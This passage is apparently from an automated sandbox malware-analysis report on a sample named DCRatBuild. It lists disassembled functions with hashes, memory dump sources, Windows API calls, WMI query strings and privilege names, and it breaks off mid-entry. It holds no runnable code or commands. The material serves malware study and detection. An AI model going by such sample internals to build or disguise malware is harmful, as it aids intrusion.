                                                                                                                        • Opcode Fuzzy Hash: 4105a517bb5c634f90eef917f57e86dc481b81f3606ce27070afe67ee91dca73
                                                                                                                        • Instruction Fuzzy Hash: CF616531600F0856DE3CAA6868917FFE3D4AB51344F14196FE982DB381D29EDD438A3E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                                                        • Instruction ID: b32f45d754360a0ef97906f114118f168a05ee7b1c211d2faa4f68377c2be99f
                                                                                                                        • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                                                        • Instruction Fuzzy Hash: E3513460604F4457DF346A6C8556BFFE3999B52304F18081BE982CB383C61DEE0693BE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2171ffc48c8aa202116489af184aec253f0768eaaf71408ffb6542a092862d3a
                                                                                                                        • Instruction ID: 8173bfe628a6dda8b9bdc2f8de9c904fd3406393a38a8ea9e580bf7831ac67d0
                                                                                                                        • Opcode Fuzzy Hash: 2171ffc48c8aa202116489af184aec253f0768eaaf71408ffb6542a092862d3a
                                                                                                                        • Instruction Fuzzy Hash: 1051E7315083D58FDB01CF35C14046EBFE4AE9A318F4909BEE4D99B243D228DA4ECB96
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 034f5682bc3412da5adbee8ce2c495cada77a672136b7a1a1d45f665def041cb
                                                                                                                        • Instruction ID: 1ee515899aa3a4636bacc7db49d87ef24742cfbb908bd539b5245319f250fc13
                                                                                                                        • Opcode Fuzzy Hash: 034f5682bc3412da5adbee8ce2c495cada77a672136b7a1a1d45f665def041cb
                                                                                                                        • Instruction Fuzzy Hash: 6651EFB1A087119FC748CF19D48055AF7E1FF88314F058A2EE899E3340D735EA59CB9A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                                                        • Instruction ID: 9f8ce82409ea7b8d31475df91e999200b8f3684fdfcaa8222bde4ac76156ef9e
                                                                                                                        • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                                                        • Instruction Fuzzy Hash: 853115B1A147468FCB14EF29C85126BBBE0FBA6305F10452EF495C7341D739EA0ACB96
APIs
• _swprintf.LIBCMT ref: 0049E30E
  • Part of subcall function 00494092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004940A5
  • Part of subcall function 004A1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,004D1030,00000200,0049D928,00000000,?,00000050,004D1030), ref: 004A1DC4
• _strlen.LIBCMT ref: 0049E32F
• SetDlgItemTextW.USER32(?,004CE274,?), ref: 0049E38F
• GetWindowRect.USER32(?,?), ref: 0049E3C9
• GetClientRect.USER32(?,?), ref: 0049E3D5
• GetWindowLongW.USER32(?,000000F0), ref: 0049E475
• GetWindowRect.USER32(?,?), ref: 0049E4A2
• SetWindowTextW.USER32(?,?), ref: 0049E4DB
• GetSystemMetrics.USER32(00000008), ref: 0049E4E3
• GetWindow.USER32(?,00000005), ref: 0049E4EE
• GetWindowRect.USER32(00000000,?), ref: 0049E51B
• GetWindow.USER32(00000000,00000002), ref: 0049E58D
Strings
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
• String ID: $%s:$CAPTION$d$tL
• API String ID: 2407758923-2975994708
• Opcode ID: e2f603fb7a61f376f425a9394ce57bfcc06ecd810f7b1274e6a1cc1dcf8c5d79
• Instruction ID: f9fa62e68e9a5e052acd76616176d7410742747162669d9c3c18d91f12392e6c
• Opcode Fuzzy Hash: e2f603fb7a61f376f425a9394ce57bfcc06ecd810f7b1274e6a1cc1dcf8c5d79
• Instruction Fuzzy Hash: B481AF72208301AFD710DFA9CD89E6BBBE9EBC9714F04092EFA8497250D735E905CB56
APIs
• ___free_lconv_mon.LIBCMT ref: 004BCB66
  • Part of subcall function 004BC701: _free.LIBCMT ref: 004BC71E
  • Part of subcall function 004BC701: _free.LIBCMT ref: 004BC730
  • Part of subcall function 004BC701: _free.LIBCMT ref: 004BC742
  • Part of subcall function 004BC701: _free.LIBCMT ref: 004BC754
  • Part of subcall function 004BC701: _free.LIBCMT ref: 004BC766
  • Part of subcall function 004BC701: _free.LIBCMT ref: 004BC778
  • Part of subcall function 004BC701: _free.LIBCMT ref: 004BC78A
  • Part of subcall function 004BC701: _free.LIBCMT ref: 004BC79C
  • Part of subcall function 004BC701: _free.LIBCMT ref: 004BC7AE
  • Part of subcall function 004BC701: _free.LIBCMT ref: 004BC7C0
  • Part of subcall function 004BC701: _free.LIBCMT ref: 004BC7D2
  • Part of subcall function 004BC701: _free.LIBCMT ref: 004BC7E4
  • Part of subcall function 004BC701: _free.LIBCMT ref: 004BC7F6
• _free.LIBCMT ref: 004BCB5B
  • Part of subcall function 004B8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,004BC896,?,00000000,?,00000000,?,004BC8BD,?,00000007,?,?,004BCCBA,?), ref: 004B8DE2
  • Part of subcall function 004B8DCC: GetLastError.KERNEL32(?,?,004BC896,?,00000000,?,00000000,?,004BC8BD,?,00000007,?,?,004BCCBA,?,?), ref: 004B8DF4
• _free.LIBCMT ref: 004BCB7D
• _free.LIBCMT ref: 004BCB92
• _free.LIBCMT ref: 004BCB9D
• _free.LIBCMT ref: 004BCBBF
• _free.LIBCMT ref: 004BCBD2
• _free.LIBCMT ref: 004BCBE0
• _free.LIBCMT ref: 004BCBEB
• _free.LIBCMT ref: 004BCC23
• _free.LIBCMT ref: 004BCC2A
• _free.LIBCMT ref: 004BCC47
• _free.LIBCMT ref: 004BCC5F
Strings
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID: hL
• API String ID: 161543041-25165468
• Opcode ID: e33041f3c70924d879b3baa3536379c41d95839b5e02fcd280c687f92d680464
• Instruction ID: 541e7f4dce243329940a65a52f9fae10aa84a7bdf5d85045fce495eb805cf50e
• Opcode Fuzzy Hash: e33041f3c70924d879b3baa3536379c41d95839b5e02fcd280c687f92d680464
• Instruction Fuzzy Hash: 7D313C316042059FEB21AA3AE8C6BDB77FDAF60314F50542FE148D6291DF39AC40CA38
APIs
• _free.LIBCMT ref: 004B9705
  • Part of subcall function 004B8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,004BC896,?,00000000,?,00000000,?,004BC8BD,?,00000007,?,?,004BCCBA,?), ref: 004B8DE2
  • Part of subcall function 004B8DCC: GetLastError.KERNEL32(?,?,004BC896,?,00000000,?,00000000,?,004BC8BD,?,00000007,?,?,004BCCBA,?,?), ref: 004B8DF4
• _free.LIBCMT ref: 004B9711
• _free.LIBCMT ref: 004B971C
• _free.LIBCMT ref: 004B9727
• _free.LIBCMT ref: 004B9732
• _free.LIBCMT ref: 004B973D
• _free.LIBCMT ref: 004B9748
• _free.LIBCMT ref: 004B9753
• _free.LIBCMT ref: 004B975E
• _free.LIBCMT ref: 004B976C
Strings
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID: 0dL
• API String ID: 776569668-2781978522
• Opcode ID: 450c3c082a28eedb65f018d3b73ed5ada6d1ba96f98b6c21b3de483fe014d7be
• Instruction ID: e825dbe8c0d18eaff0c8419d0e0321fbd2610366a2e31d4c87c7526b4e1089f1
• Opcode Fuzzy Hash: 450c3c082a28eedb65f018d3b73ed5ada6d1ba96f98b6c21b3de483fe014d7be
• Instruction Fuzzy Hash: CD119476110109BFCB01EF55C842DD93BBDAF24354B9154AAFA084B262DE35DE50DFA8
APIs
• _wcslen.LIBCMT ref: 004A9736
• _wcslen.LIBCMT ref: 004A97D6
• GlobalAlloc.KERNEL32(00000040,?), ref: 004A97E5
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 004A9806
• CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 004A982D
Strings
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
• String ID: FjunJ$</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
• API String ID: 1777411235-4029663861
• Opcode ID: 21aca03fa7d978f753e00065a2c569133dc10e587e4d3ad81558845b2555da72
• Instruction ID: 66333213fad4ec8ea7b62094bf871f2ecd5e8ef1714e407af42edc50dcb569d3
• Opcode Fuzzy Hash: 21aca03fa7d978f753e00065a2c569133dc10e587e4d3ad81558845b2555da72
• Instruction Fuzzy Hash: 143139361093017AD725AF269C06FAB77989FA3325F14011FF501962D2EB6CDE0482BD
APIs
• GetWindow.USER32(?,00000005), ref: 004AD6C1
• GetClassNameW.USER32(00000000,?,00000800), ref: 004AD6ED
  • Part of subcall function 004A1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0049C116,00000000,.exe,?,?,00000800,?,?,?,004A8E3C), ref: 004A1FD1
• GetWindowLongW.USER32(00000000,000000F0), ref: 004AD709
• SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 004AD720
• GetObjectW.GDI32(00000000,00000018,?), ref: 004AD734
• SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 004AD75D
• DeleteObject.GDI32(00000000), ref: 004AD764
• GetWindow.USER32(00000000,00000002), ref: 004AD76D
Strings
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
• String ID: STATIC
• API String ID: 3820355801-1882779555
• Opcode ID: 30fbb9c708792692139b87a17e54dac2596f6c44638c4a38f292bf6a57127038
• Instruction ID: 077c064d29bfa8b0b70d0f7fa8413f8893578d76fe437dfca8aca125aa1426d2
• Opcode Fuzzy Hash: 30fbb9c708792692139b87a17e54dac2596f6c44638c4a38f292bf6a57127038
• Instruction Fuzzy Hash: DB1121369003107FE2216F70AC4AFAF765CAF66712F008137FA52A2191DB6C8F5586BD
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                                                        • String ID: csm$csm$csm
                                                                                                                        • API String ID: 322700389-393685449
                                                                                                                        • Opcode ID: c589c5cbf7d2459e6c21458ea0093e53472b299c138abca86df790f16babb742
                                                                                                                        • Instruction ID: 1379d84643e33fe16eca563c45d38c6bbbe7b9f3234e9a9b34ba435edd0943f1
                                                                                                                        • Opcode Fuzzy Hash: c589c5cbf7d2459e6c21458ea0093e53472b299c138abca86df790f16babb742
                                                                                                                        • Instruction Fuzzy Hash: 94B17A31800209EFCF24EFAAC9809EFB7B9BF04315B14455BE8016B312D779DA11DBA9
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog
                                                                                                                        • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$nJ
                                                                                                                        • API String ID: 3519838083-1706884476
                                                                                                                        • Opcode ID: 6fd99393745f2108e7e214756020f255d2c56ccb0cfecd89cab5977dc4b7e00d
                                                                                                                        • Instruction ID: de9eff2a58cf46400ac25e2f80f667f9bdf6966339ce5fdf79a62b659faf2003
                                                                                                                        • Opcode Fuzzy Hash: 6fd99393745f2108e7e214756020f255d2c56ccb0cfecd89cab5977dc4b7e00d
                                                                                                                        • Instruction Fuzzy Hash: E5718F70A00219AFDF14DF65DC95EAFBBB9FF49315B10416EE412A72A0CB346D01CBA4
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00496FAA
                                                                                                                        • _wcslen.LIBCMT ref: 00497013
                                                                                                                        • _wcslen.LIBCMT ref: 00497084
                                                                                                                          • Part of subcall function 00497A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00497AAB
                                                                                                                          • Part of subcall function 00497A9C: GetLastError.KERNEL32 ref: 00497AF1
                                                                                                                          • Part of subcall function 00497A9C: CloseHandle.KERNEL32(?), ref: 00497B00
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                                                        • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                        • API String ID: 3122303884-3508440684
                                                                                                                        • Opcode ID: 5718283c9b6b76404b572e1edf8309631123f8e2b0bfca86f75f0c37041548fe
                                                                                                                        • Instruction ID: e7cc9046da5a6549a66165f64bf7b44785c3102e1d38000a0d4e7cb6a79a30f4
                                                                                                                        • Opcode Fuzzy Hash: 5718283c9b6b76404b572e1edf8309631123f8e2b0bfca86f75f0c37041548fe
                                                                                                                        • Instruction Fuzzy Hash: B941D5B1D18344BAEF20EB719C42FEF7B6C9F05308F00446BF955A6282D67CAA448769
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00491316: GetDlgItem.USER32(00000000,00003021), ref: 0049135A
                                                                                                                          • Part of subcall function 00491316: SetWindowTextW.USER32(00000000,004C35F4), ref: 00491370
                                                                                                                        • EndDialog.USER32(?,00000001), ref: 004AB610
                                                                                                                        • SendMessageW.USER32(?,00000080,00000001,?), ref: 004AB637
                                                                                                                        • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 004AB650
                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 004AB661
                                                                                                                        • GetDlgItem.USER32(?,00000065), ref: 004AB66A
                                                                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 004AB67E
                                                                                                                        • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 004AB694
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                                        • String ID: LICENSEDLG
                                                                                                                        • API String ID: 3214253823-2177901306
                                                                                                                        • Opcode ID: e485b74a43af8bbce091cd74bec4b991efd18552e0db8418da5d2f71b75c5c74
                                                                                                                        • Instruction ID: b958122a38c631b92119052e764e6ec3d0e40baf4e30e75e9a649ce444c5624e
                                                                                                                        • Opcode Fuzzy Hash: e485b74a43af8bbce091cd74bec4b991efd18552e0db8418da5d2f71b75c5c74
                                                                                                                        • Instruction Fuzzy Hash: 5321F332200204BBE6119F76EC49F7B3B6CFB5BB46F11402AF600965A2CF5A9911D67E
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,F3417122,00000001,00000000,00000000,?,?,0049AF6C,ROOT\CIMV2), ref: 004AFD99
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0049AF6C,ROOT\CIMV2), ref: 004AFE14
                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 004AFE1F
                                                                                                                        • _com_issue_error.COMSUPP ref: 004AFE48
                                                                                                                        • _com_issue_error.COMSUPP ref: 004AFE52
                                                                                                                        • GetLastError.KERNEL32(80070057,F3417122,00000001,00000000,00000000,?,?,0049AF6C,ROOT\CIMV2), ref: 004AFE57
                                                                                                                        • _com_issue_error.COMSUPP ref: 004AFE6A
                                                                                                                        • GetLastError.KERNEL32(00000000,?,?,0049AF6C,ROOT\CIMV2), ref: 004AFE80
                                                                                                                        • _com_issue_error.COMSUPP ref: 004AFE93
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1353541977-0
                                                                                                                        • Opcode ID: 052bec0e05b0d260b9f8c76bdeb9cad6ab3ab4a53860e5673e22f6665b50ffe6
                                                                                                                        • Instruction ID: f663094ad4b940b0da65d73094b12caf6b861f9a1810c86d26ce2d51af9cd563
                                                                                                                        • Opcode Fuzzy Hash: 052bec0e05b0d260b9f8c76bdeb9cad6ab3ab4a53860e5673e22f6665b50ffe6
                                                                                                                        • Instruction Fuzzy Hash: B9410871A00205ABDB109FAACC45FAFBBA8EB55715F10823FF905E7391D738990487A9
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00499387
                                                                                                                        • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 004993AA
                                                                                                                        • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 004993C9
                                                                                                                          • Part of subcall function 0049C29A: _wcslen.LIBCMT ref: 0049C2A2
